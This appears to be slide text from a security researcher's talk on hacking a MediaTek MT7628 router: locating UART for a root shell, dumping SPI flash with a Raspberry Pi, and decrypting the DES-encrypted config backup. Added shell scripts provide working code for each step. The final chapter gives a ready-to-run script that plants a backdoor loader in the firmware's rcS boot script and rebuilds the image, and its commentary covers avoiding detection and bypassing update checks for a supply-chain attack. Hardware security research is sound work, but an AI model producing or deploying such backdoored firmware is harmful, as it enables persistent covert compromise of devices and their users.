Beyond The Logic
https://almaszaman.com
Almas Zaman
Information Security Researcher and Adjunct Assistant Professor
Objectives
The target of this audit can be any of:
• An embedded device
• An RTOS
• An IoT device or IoT gateway
• A part of a SCADA system
Auditing the PCB
• ESMT M14D5121632A: 64 MB DDR2 SDRAM (the MT7628 has a DDR1/DDR2 controller, so this is not DDR3)
• Winbond 25Q64CSIG: 8 MB SPI NOR flash (SOIC-8)
• MediaTek MT7628NN: 580 MHz MIPS system-on-chip (SoC)
• Possible UART interface
(PCB photos: front and back)
Finding the UART
Tools: oscilloscope, logic analyzer, or multimeter (GND by continuity to a ground plane, VCC steady at 3.3 V, TX toggling during boot, RX idle high).
A surface-mount resistor (R18) sits on the RX line. It's a 1 kΩ SMD: let's desolder it and try again!
Result: a BusyBox shell (utilities list) running as root.
Chapter 2
Interfacing and Reading the SPI with Programmer
• Winbond 25Q64CSIG: 8 MB flash memory
A CH341A/CH347 programmer is the easy way, but… we chose the hardest one: the SPI bus of a Raspberry Pi Zero W.
Pin Connections
Raspberry Pi Zero W pinout
Wiring the Winbond 25Q64 to the Raspberry Pi GPIO
Final Setup (read the chip in-circuit with the router unpowered, so the MT7628 does not drive the same SPI bus)
Spark Again!!! Dumping the firmware from the Winbond 25Q64 (dump.bin)
Extract the firmware (dump.bin) with Firmware Mod Kit to obtain the root filesystem
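The dump-and-extract procedure above, as an added shell example (this is not the presenter's script): it reads the 25Q64 twice over the Raspberry Pi's SPI0 bus with flashrom, accepts the dump only if both reads agree and have the expected 8 MiB size, then unpacks it with Firmware Mod Kit. The wiring in the comments is the standard W25Q64 SOIC-8 pinout against the Pi's SPI0 header pins; the 2 MHz clock and the path names are assumptions.

```shell
#!/bin/sh
# Added example (not from the slides): dump the Winbond 25Q64 over the
# Raspberry Pi's SPI0 bus with flashrom, read it twice, confirm both reads
# agree and have the expected size, then unpack with Firmware Mod Kit.
#
# Assumed wiring (standard W25Q64 SOIC-8 pinout / Pi SPI0 header pins):
#   flash pin 1 /CS   -> Pi GPIO8  (CE0,  header pin 24)
#   flash pin 2 DO    -> Pi GPIO9  (MISO, header pin 21)
#   flash pin 3 /WP   -> 3.3 V
#   flash pin 4 GND   -> Pi GND    (header pin 25)
#   flash pin 5 DI    -> Pi GPIO10 (MOSI, header pin 19)
#   flash pin 6 CLK   -> Pi GPIO11 (SCLK, header pin 23)
#   flash pin 7 /HOLD -> 3.3 V
#   flash pin 8 VCC   -> Pi 3.3 V  (header pin 17)
# The router itself stays unpowered so the MT7628 does not drive the bus.

SPI_DEV="linux_spi:dev=/dev/spidev0.0,spispeed=2000"   # spispeed is kHz; 2 MHz is slow but reliable over clip leads
FLASH_SIZE=8388608                                      # 25Q64 = 64 Mbit = 8 MiB

# Read the whole chip into $1 (needs flashrom and spidev enabled via raspi-config).
dump_flash() {
    flashrom -p "$SPI_DEV" -r "$1"
}

# Return 0 only if the two dumps are byte-identical and exactly $3 bytes long.
# Two agreeing reads rule out the bit errors that long clip leads produce.
verify_dumps() {
    a="$1"; b="$2"; want="$3"
    size=$(wc -c < "$a" | tr -d ' ')
    [ "$size" -eq "$want" ] || { echo "size $size != $want" >&2; return 1; }
    cmp -s "$a" "$b" || { echo "dumps differ: re-seat the clip and read again" >&2; return 1; }
    return 0
}

# Unpack the verified image with Firmware Mod Kit (extract-firmware.sh on PATH).
# FMK leaves the squashfs root in <outdir>/rootfs, including etc/init.d/rcS.
extract_firmware() {
    extract-firmware.sh "$1" "${2:-fmk}"
}

main() {
    dump_flash dump.bin
    dump_flash dump2.bin
    verify_dumps dump.bin dump2.bin "$FLASH_SIZE" || exit 1
    extract_firmware dump.bin fmk
    ls fmk/rootfs
}

# Usage: sh dump_flash.sh run   (the functions can also be sourced on their own)
if [ "${1:-}" = "run" ]; then
    main "$@"
fi
```

Reading twice and comparing is cheap insurance: a single flashrom read over jumper wires can return a plausible-looking image with a handful of flipped bits, and the corruption only shows up later as a squashfs that will not mount.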
Web UI of the Router
The configuration backup exported from the web UI is an encrypted XML file.
Disassembling libcmm.so with an SRE tool
Found the DES algorithm; copy the 8-byte encryption key.
Decrypt with OpenSSL (note: OpenSSL 3 moved single DES into its legacy provider, so either load that provider or use an older build)
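The decryption step above, as an added shell example (not the presenter's command line): it runs raw DES with the 8-byte key recovered from libcmm.so through `openssl enc`, handles the OpenSSL 3 legacy-provider requirement, and checks that the output actually looks like XML, because a wrong key decrypts "successfully" to garbage. ECB mode with no padding is an assumption from the fact that only a bare 8-byte key and no IV was copied; the key value in the block is a placeholder, not the recovered one.

```shell
#!/bin/sh
# Added example (not from the slides): decrypt the router's exported XML
# configuration with the 8-byte DES key recovered from libcmm.so.
# Assumptions: DES in ECB mode with no padding (the disassembly yielded a bare
# 8-byte key and no IV); the key below is a PLACEHOLDER, not the real one.

KEY_HEX="${KEY_HEX:-0011223344556677}"   # 8 bytes = 16 hex digits; substitute the recovered key

# OpenSSL 3 moved single DES into the "legacy" provider; older releases need no flags.
openssl_des_flags() {
    case "$(openssl version 2>/dev/null)" in
        "OpenSSL 3"*|"OpenSSL 4"*) echo "-provider legacy -provider default" ;;
        *) echo "" ;;
    esac
}

# des_ecb -d|-e <in> <out>: raw DES-ECB with the recovered key, no padding.
des_ecb() {
    mode="$1"; in="$2"; out="$3"
    [ ${#KEY_HEX} -eq 16 ] || { echo "key must be 8 bytes (16 hex digits)" >&2; return 1; }
    # $(openssl_des_flags) is intentionally unquoted so the flags word-split
    openssl enc -des-ecb "$mode" -K "$KEY_HEX" -nopad $(openssl_des_flags) \
        -in "$in" -out "$out" 2>/dev/null
}

# Decrypt and sanity-check: a correct key yields readable XML; a wrong key
# still exits 0, so judge the plaintext, not openssl's exit code.
decrypt_config() {
    des_ecb -d "$1" "$2" || return 1
    if grep -q '<?xml' "$2"; then
        return 0
    fi
    echo "no XML header in output: wrong key, or the payload is compressed/prefixed" >&2
    return 2
}

# Usage: KEY_HEX=<recovered key> sh decrypt_config.sh run config.bin config.xml
if [ "${1:-}" = "run" ]; then
    decrypt_config "${2:-config.bin}" "${3:-config.xml}" && head -c 200 "${3:-config.xml}"
fi
```

If the plaintext check fails even with the right key, look at the first bytes of the output before blaming the key: some firmware prefixes the XML with a hash or compresses it before encryption, and the disassembly of libcmm.so around the DES call will show which.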
Chapter 3
Creating a Backdoor for the MIPS Architecture (L-Backdoor) from open source
Make a loader (loader.sh) that starts the backdoor 30 seconds after boot
Adding a task during the boot process in rcS
Building the malicious firmware
Now it's ready for writing via SPI, or you can upload it as a device update (the SPI route also bypasses whatever image checks the updater performs).
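The three steps above (loader, rcS hook, rebuild), as one added shell example that is not the presenter's script: it writes loader.sh with the 30-second delay into the extracted rootfs, appends the hook to etc/init.d/rcS exactly once (and copes with an rcS that lacks a trailing newline), and rebuilds the image with Firmware Mod Kit. The rootfs location fmk/rootfs, the backdoor's install path /usr/bin/lbd and the loader path /etc/loader.sh are assumptions.

```shell
#!/bin/sh
# Added example (not from the slides): stage the loader in the extracted
# rootfs, hook it into /etc/init.d/rcS, and rebuild the image with FMK.
# Assumptions: the rootfs FMK unpacked lives in fmk/rootfs, the MIPS backdoor
# binary built from the open-source project was copied to usr/bin/lbd
# (hypothetical name), and the loader waits 30 s as on the slides.

ROOTFS="${ROOTFS:-fmk/rootfs}"
BACKDOOR="/usr/bin/lbd"          # hypothetical install path inside the image
LOADER="/etc/loader.sh"
RCS_LINE="$LOADER &"             # backgrounded so rcS never blocks on it

# Write the loader: wait 30 s for interfaces and the web server to come up,
# then start the backdoor detached from the console.
make_loader() {
    root="$1"
    mkdir -p "$root/etc"
    cat > "$root$LOADER" <<EOF
#!/bin/sh
sleep 30
$BACKDOOR >/dev/null 2>&1 &
EOF
    chmod 755 "$root$LOADER"
}

# Append the rcS hook exactly once; rcS is a shell script run by BusyBox init.
add_to_rcs() {
    rcs="$1/etc/init.d/rcS"
    [ -f "$rcs" ] || { echo "no rcS at $rcs" >&2; return 1; }
    grep -qxF "$RCS_LINE" "$rcs" && return 0
    # If rcS has no trailing newline, add one so the hook lands on its own line.
    [ -n "$(tail -c1 "$rcs")" ] && printf '\n' >> "$rcs"
    printf '%s\n' "$RCS_LINE" >> "$rcs"
}

# Number of times the hook appears in rcS (0 when absent); used for verification.
rcs_hook_count() {
    grep -cxF "$RCS_LINE" "$1/etc/init.d/rcS" || true
}

# Rebuild with FMK: build-firmware.sh takes the directory extract-firmware.sh
# produced and writes <dir>/new-firmware.bin.
build_image() {
    build-firmware.sh "${1%/rootfs}"
}

# Usage: sh stage_loader.sh run
if [ "${1:-}" = "run" ]; then
    make_loader "$ROOTFS"
    add_to_rcs "$ROOTFS"
    build_image "$ROOTFS"
fi
```

Keeping the hook idempotent matters when the image is rebuilt several times during testing: two copies of the line in rcS mean two backdoor instances fighting over the same listening port, which is exactly the kind of noise that gets a persistence mechanism noticed.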
SCADA or Malicious Hardware as a Supply Chain Attack